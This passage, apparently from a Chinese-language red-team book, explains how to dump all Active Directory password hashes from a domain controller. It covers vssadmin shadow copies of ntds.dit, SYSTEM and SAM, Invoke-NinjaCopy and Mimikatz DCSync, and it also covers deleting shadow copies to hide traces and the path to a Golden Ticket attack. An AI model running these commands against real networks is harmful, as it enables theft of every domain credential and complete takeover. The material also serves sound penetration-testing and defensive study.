Question

一旦我们获得域管理员的访问权限，从域控制器获取所有散列的旧方法就是，在域控制器上运行命令，使用 Shadow Volume 或 Raw 复制方法，获得 Ntds.dit 文件。

回顾 Shadow Volume 复制方法

由于我们可以访问文件系统，并且可以在域控制器上运行命令，因此作为攻击者，我们可以获取存储在 Ntds.dit 文件中的所有域散列值。但是，该文件不断被读/写，即使拥有系统权限，我们也没有读取或复制该文件的机会。“幸运”的是，我们可以利用 Windows 功能 - Volume Shadow 复制服务（VSS），该功能可以创建卷的快照副本。然后，我们可以从该副本中读取 Ntds.dit 文件并将其从机器中取出。这包括窃取 Ntds.dit、System、SAM 和 Boot Key 文件。最后，我们需要消除痕迹并删除卷副本。

• C:\vssadmin create shadow/for=C:
• copy
  \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[DISK_NUM BER]
  \windows\ntds\ntds.dit
• copy
  \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[DISK_NUM BER]
  \windows\system32\config\SYSTEM
• copy
  \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[DISK_NUM BER]
  \windows\system32\config\SAM
• reg SAVE HKLM\SYSTEM c:\SYS
• vssadmin delete shadows/for= [/oldest |/all |/shadow=]

1．NinjaCopy

NinjaCopy（http://bit.ly/2HpvKwj）是另一个获取散列值的工具，运行在域控制器，可以用来获取 Ntds.dit 文件。NinjaCopy 通过读取原始卷，解析 NTFS 结构，并从 NTFS 分区卷复制文件。这会绕过文件 DACL、读句柄锁和 SACL 检测。您必须是管理员才能运行脚本。这可用于读取系统被锁定的文件，例如 NTDS.dit 文件或注册表配置单元。

• Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "c:\windows\ temp\ ntds.dit"

2．DCSync

到目前为止，我们已经回顾了两个从域控制器获取散列值的旧方法，这两个方法的前提条件是您可以在域控制器上运行系统命令，并且通常在该机器上存储文件，下面我们将尝试新的方法。最近，由 Benjamin Delpy 和 Vincent Le Toux 提出的 DCSync 方法被多次提及，这个方法改变了域控制器导出散列的思路。DCSync 实现的思路是劫持域控制器，请求该域中用户的所有散列值。仔细思考一下就会发现，这意味着，只要您具有权限，就不需要在域控制器上运行任何命令，也不必在域控制器上放置任何文件。

DCSync 方法有效的前提是，必须拥有从域控制器中提取散列值的适当权限。通常仅限于域管理员、组织管理员、域控制器组以及具有将 Replicating Changes 设置为 Allow（例如 Replicating Changes All/Replicating Directory Changes）权限的用户，DCSync 方法将允许您的用户执行此攻击。此攻击最初是在 Mimikatz 中实施的，可以使用以下命令进行。

• Lsadump::dcsync/domain:[YOUR DOMAIN]
  /user:[Account_to_Pull_Hashes]

更棒的是，PowerShell Empire 集成了 DCSync 工具，因此使用更加方便。

Empire 代码：powershell/credentials/mimikatz/dcsync_hashdump。

通过查看 DCSync 导出的散列值，如图 4.43 所示，我们找到了活动目录中用户的所有 NTLM 散列值。另外，我们拥有 krbtgt NTLM 散列，这意味着我们现在（或在后续的行动中）可以实施 Golden Ticket 攻击。

图 4.43